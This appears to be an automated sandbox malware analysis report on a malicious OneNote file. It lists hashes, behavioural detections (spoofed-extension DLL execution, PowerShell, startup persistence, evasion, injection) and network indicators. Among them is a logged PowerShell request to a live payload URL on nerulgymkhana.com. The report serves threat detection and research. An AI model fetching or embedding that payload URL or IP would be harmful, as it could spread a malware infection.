Automated Malware Analysis Management Report for Original.one

Overview

General Information

Sample Name:	Original.one
Analysis ID:	800789
MD5:	f727e5b082e13d521668e2908b3b7607
SHA1:	4eb0f8309b33e7f79cfa2d37523690dbe1ad0c97
SHA256:	8529b2ec8ed9d701904b8e2560cb3f12d049fedecb588102b5baf6d7a4c7830a
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Execute DLL with spoofed extension

Malicious sample detected (through community Yara rule)

Document exploit detected (process start blacklist hit)

Suspicious powershell command line found

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Creates a start menu entry (Start Menu\Programs\Startup)

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Signatures

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 109.203.123.62:443 -> 192.168.2.3:49704 version: TLS 1.0

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /CCoN/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: nerulgymkhana.comConnection: Keep-Alive

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 109.203.123.62:443 -> 192.168.2.3:49704 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: powershell.exe, 00000003.00000002.274034149.0000027D4FF53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000003.00000002.274530600.0000027D500B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.aadrm.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.office.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.onedrive.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://api.scheduler.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://augloop.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cdn.entity.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cortana.ai/api
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://cr.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://d.docs.live.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://directory.services.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://graph.windows.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://graph.windows.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://invites.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://login.windows.local
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://make.powerautomate.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://management.azure.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://management.azure.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://messaging.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000003.00000002.274530600.0000027D50643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.274530600.0000027D50566000.00000004.00000800.00020000.00000000.sdmp, in.cmd.1.dr	String found in binary or memory: https://nerulgymkhana.com/CCoN/01.gif
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://officeapps.live.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://onedrive.live.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office365.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://pushchannel.1drv.ms
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://settings.outlook.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://tasks.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
